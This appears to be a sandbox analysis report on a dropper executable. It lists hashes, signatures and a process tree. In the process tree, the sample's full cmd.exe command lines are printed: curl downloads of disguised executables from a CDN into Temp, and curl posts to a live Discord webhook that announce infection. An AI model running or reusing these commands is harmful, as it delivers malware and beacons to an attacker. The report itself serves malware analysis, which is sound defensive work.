Analysis
max time kernel: 117s
max time network: 118s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 22-06-2024 08:24
Static task: static1
  1 signatures
Behavioral task: behavioral1
  Sample: Dropper.exe
  Resource: win7-20240508-en
  2 signatures
  150 seconds
Behavioral task: behavioral2
  Sample: Dropper.exe
  Resource: win10v2004-20240226-en
  25 signatures
  150 seconds
General
Target: Dropper.exe
Size: 12KB
MD5: b11d9f89c1129428957175b7c55e8637
SHA1: 6a1530364e3bf3c13a6500bdd313e1d8d4294301
SHA256: b390f949531dac7a42bee35fc98e1b9890361b2be5fa3efcc8cae8263174244f
SHA512: e368f3db1c511c6cfbb95f04c98e9df7fcda718f3f9c56dd34f5e9595eda9d072dc4af351a7ea7a2cea6f65117f7e2dd98fc97d6d6631673fdcdf939abe963ba
SSDEEP: 384:fHPFcbjfi27q9bJnz6PbQGw+pfolwmfhhDj4VCsL:3yfiD9bJMbKwkhhD0wsL
Score: 3/10
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (28 IoCs)
  Processes:
  description                       pid   process      target process
  PID 1708 wrote to memory of 2344  1708  Dropper.exe  Dropper.exe
  PID 1708 wrote to memory of 2344  1708  Dropper.exe  Dropper.exe
  PID 1708 wrote to memory of 2344  1708  Dropper.exe  Dropper.exe
  PID 1708 wrote to memory of 2344  1708  Dropper.exe  Dropper.exe
  PID 2344 wrote to memory of 2612  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2612  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2612  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2612  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2660  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2660  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2660  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2660  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2716  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2716  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2716  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2716  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2744  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2744  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2744  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2744  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2676  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2676  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2676  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2676  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2624  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2624  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2624  2344  Dropper.exe  cmd.exe
  PID 2344 wrote to memory of 2624  2344  Dropper.exe  cmd.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\Dropper.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\Dropper.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
    - C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
    - C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
    - C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
    - C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe
    - C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone \n`$77-aachost.exe, $77-sdchost.exe, $77-penisballs.exe, and $77-install.exe` Was Just On On Admin's PC"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
- memory/1708-0-0x000000007491E000-0x000000007491F000-memory.dmp (Filesize: 4KB)
- memory/1708-1-0x0000000001060000-0x000000000106A000-memory.dmp (Filesize: 40KB)
- memory/2344-2-0x0000000074890000-0x0000000074F7E000-memory.dmp (Filesize: 6.9MB)
- memory/2344-3-0x0000000074890000-0x0000000074F7E000-memory.dmp (Filesize: 6.9MB)